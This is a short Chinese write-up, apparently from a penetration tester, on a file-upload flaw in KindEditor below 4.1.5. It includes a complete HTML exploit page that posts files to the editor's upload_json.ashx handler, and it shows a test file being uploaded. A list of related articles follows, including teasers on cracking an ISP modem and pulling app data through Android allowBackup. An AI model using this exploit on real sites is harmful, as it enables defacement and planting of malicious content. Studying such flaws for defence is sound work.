kindeditor编辑器文件上传漏洞

article/2025/9/16 16:03:03

kindeditor编辑器版本小于4.1.5存在文件上传漏洞,可利用该漏洞上次网页、文本文件,可网站进行篡改,添加赌博、反共等违法信息。

通过扫描器发现该网站存在编辑器。

通过浏览器访问,确定该编辑器为kindeditor编辑器。

确定该编辑器的版本小于4.1.5,存在文件上传漏洞。

构造文件上传漏洞利用脚本kindeditor.html。

<html><head><title>Uploader</title><script src="https://url/editor/kindeditor.js"></script><script>KindEditor.ready(function(K) {var uploadbutton = K.uploadbutton({button : K('#uploadButton')[0],fieldName : 'imgFile',url : 'https://url/editor/asp.net/upload_json.ashx?dir=file',afterUpload : function(data) {if (data.error === 0) {var url = K.formatUrl(data.url, 'absolute');K('#url').val(url);}},});uploadbutton.fileBox.change(function(e) {uploadbutton.submit();});});</script></head><body><div class="upload"><input class="ke-input-text" type="text" id="url" value="" readonly="readonly" /><input type="button" id="uploadButton" value="Upload" /></div></body></html>

本地打开构建好的html文件

利用漏洞利用脚本上传测试文件uptext.txt,并使用工具抓取数据包。

在返回包中获取到文件上传位置,并使用浏览器成功访问。


http://chatgpt.dhexx.cn/article/FEGg8FwB.shtml

相关文章

关于网站后台KindEditor编辑器存在安全漏洞

[TO一、 漏洞基本情况 Kindeditor上的uploadbutton.html是用于文件上传功能的页面&#xff0c;因其upload_json.*上传功能文件允许被直接调用&#xff0c;从而实现上传htm,html,txt等文件到服务器&#xff0c;攻击者利用此漏洞可直接在上传的htm,html文件中添加跳转到违法网站…

linux重启后etc目录被还原,干货分享丨如何恢复Linux下误删etc目录数据

对于运维工作者来说,可能最让人担心的,是服务器宕机; 最让人无助的,是被DDOS; 而最让人心惊肉跳的,是rm -rf *这个命令…… 当你执行rm -rf命令时,万一哪个变量没赋值 听说过被删空服务器么? mysql数据库不是在运行吗? linux能删除正在执行的文件?反正是彻底删除了……

苹果手机sim卡无效怎么办_苹果手机解锁密码忘了怎么办

现在手机对于我们每一个人来说都是非常重要的&#xff0c;所以会设定屏幕密码以防隐私被他人看到。但是也避免不了忘记屏幕密码的时候&#xff0c;那么苹果手机解锁密码忘了怎么办呢&#xff1f;下面小编给大家介绍下苹果手机密码忘了怎么解锁的各种办法。 苹果手机解锁密码忘了…

navicat还原mysql备份文件时roll back

一、navicat还原mysql备份文件时roll back&#xff0c;导致的原因是因为备份文件过大&#xff0c;需要更改mysql安装目录中的my.ini。 二、到mysql安装目录中找到my.ini文件。 三、右键用记事本打开&#xff0c;先搜索文件中有没有max_allowed_packet。 四、如果没有找到max_a…

parsed mapper file卡住不动解决思路

发现问题就直接搜索了起来&#xff0c;总结下&#xff1a; 1、断点org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory&#xff0c;所有catch方法都打断点 2、检查mapper语法是否正确 3、断点导致&#xff0c;去掉所有断点&#xff0c;控制台上 m…

My SQL—CRUD初阶(增删改查)

这里写目录标题 回顾My SQL基本CRUD(增删改查)操作新增查找全列查找指定列查询指定查询字段为表达式查询字段指定别名去重排序条件查询模糊查询分页查询 修改删除 回顾 类似的&#xff0c;SQL Server 和Oracle也是采取类似的方式来组织数据的&#xff0c;这样的数据库叫做“关系…

balenaEtcher烧录U盘/SD卡恢复方法

今天用balenaEtcher-portable-1.5.115烧录了SD卡&#xff0c; 结果发现自己的笔记本不支持SD卡启动&#xff0c;就想把SD卡恢复了&#xff0c;结果发现win7无法恢复。度娘给的方法太费劲还不保证成功&#xff0c;就谷歌找了一下&#xff0c;很容易就找到了方法&#xff08;原文…

冰点还原精灵使用教程

DeepFreeze是一个系统的保护软件&#xff0c;不论什么原因你的系统出现了故障&#xff0c;它都可以快速的恢复到你原先的状态和设置。它会随时记录你的操作&#xff0c;当前打开的文件&#xff0c;运行着的程序和各项设置。程序安全性能非常高,目前还没有听说有什么办法能够破解…

w ndows10还原点,创建Windows10系统还原点快捷方式方法

通常情况下 Windows 10 会在系统有重大变更(例如进 Windows Update)时自动创建还原点,有些驱动程序(例如 Intel 显卡驱动)在安装时也会自动创建系统还原点,当然我们也可以在任何需要的时候手动创建还原点。本文中,我们所要介绍的是通过快捷方式创建 Windows 10 系统还原点。 检…

Android 游戏破解修改金币

这里是通过AndroidManifest.xml中的allowbackup属性去盗取手机中存储的信息,只要有信息存储在本地都可盗取出来(前提是你能拿到手机) 为什么研究这个技术:1,应用市场上修改游戏金币的软件很多,但是大概都需要root权限,所以就想能不能在不root的情况下修改金币和血量,2预防被盗信…

android 卡片放大变详情页,ConstraintLayout动画实现布局卡片式滑动放大缩放

ConstraintLayout(约束布局)是Android Studio 2.2中主要的新增功能之一,Android studio升级到2.3版本之后,不管是新建Activity或fragment,xml默认布局由RelativeLayout更改为ConstraintLayout了。 按照以往惯例先上效果图: GIF.gif 上图效果所示 根据手势滑动View 改变View…

破解联通HG8347R光猫

原文链接:https://youendless.com/post/unicom_cat 安装的联通宽带,自带的光猫设备型号HG8347R,看光猫后面可以清楚的看见这个设备是华为生产的,联通定制版本,后台管理页面基本只有设备重启这个功能了,其他所有的功能都被屏蔽,无法操作。自带光猫是不支持5G的,并且只有…

记一次MySql还原导致的无法连接

问题 昨天同事使用服务器的MySql数据库还原了一个5GB的备份&#xff0c;结果一直卡住&#xff0c;他就将数据库强行关闭&#xff0c;没再执行任何其他操作。 结果今天客户反馈登录异常。逐步排查&#xff0c;定位到是数据库无法访问。于是远程查看服务器&#xff0c;发现&…

iTerm 2 Oh My Zsh【DIY教程—亲身体验过程】完美替代教程汇总!

一年前&#xff0c;在搞终端的时候偶然一次机会&#xff0c;让我看到了各种强大的DIY界面&#xff0c;这让我很想去自己搞一个。于是在网上不断的寻找资源&#xff0c;也请教了大多数朋友。最终以失败告终。最近&#xff0c;本人又突然想起当时这件事&#xff0c;于是&#xff…

Windows Terminal美化:oh-my-posh配置记录

Windows Terminal美化&#xff1a;oh-my-posh配置记录 前置&#xff1a;安装Windows Terminal powershell&#xff0c;打开终端&#xff0c;默认路径为powershell。 这个流程踩了不少坑&#xff0c;记录在错误示范&#xff0c;正确的配置流程请移步配置流程。 [ 2023-3-13 ] …

存储卡修复软件测试自学,扩容内存卡用mydisktest失效,教你怎么用USBoot恢复出真实容量...

贪便宜在某宝花了14元包邮买了张32G的TF卡&#xff0c;购买之前不断强调如果是扩容卡卖家包邮退货&#xff0c;卖家都狠狠答应了&#xff0c;人家都这样讲了能不买吗&#xff1f;。 卡拿到手后先格式化&#xff0c;看属性还是32G&#xff0c;然后复制一个近8G的DVD镜像文件进去…

操作系统真象还原

整体框架 &#xff1a;mbr.S->loader.S&#xff1a;当os镜像被加载之后&#xff0c;cpu转去main的起止位置开始执行。&#xff08;到目前为止&#xff0c;控制权已经掌握在自己手里&#xff09; 接下来就要一步一步搭建起内核模块&#xff1a; 一&#xff1a;实现基本的输…

还原卡还原了数据能恢复吗_主动还原:我们可以更快地恢复吗? 快多了?

还原卡还原了数据能恢复吗 Hi! My name is Daulet Tymbayev, and today I want to share my experience of developing a system that (theoretically) is able to recover a disk much faster than traditional recovery. Let’s start from the beginning to cover all the p…

纯html 404页面,一款纯css3实现的漂亮的404页面_html/css_WEB-ITnose

一款纯css3实现的漂亮的404页面_html/css_WEB-ITnose 之前为大家分享了那些创意有趣的404页面&#xff0c; html5和css3打造一款创意404页面&#xff0c; HTML5可爱的404页面动画很逗的机器人。今天再给大家分享一款纯css3实现的漂亮的404页面。效果图如下&#xff1a; 在线预…

VUE 404页面的实现

效果图&#xff1a; 实现方式&#xff1a; 创建一个404的vue页面 <template><div class"wscn-http404-container"><div class"wscn-http404"><div class"pic-404"><imgclass"pic-404__parent"src"/…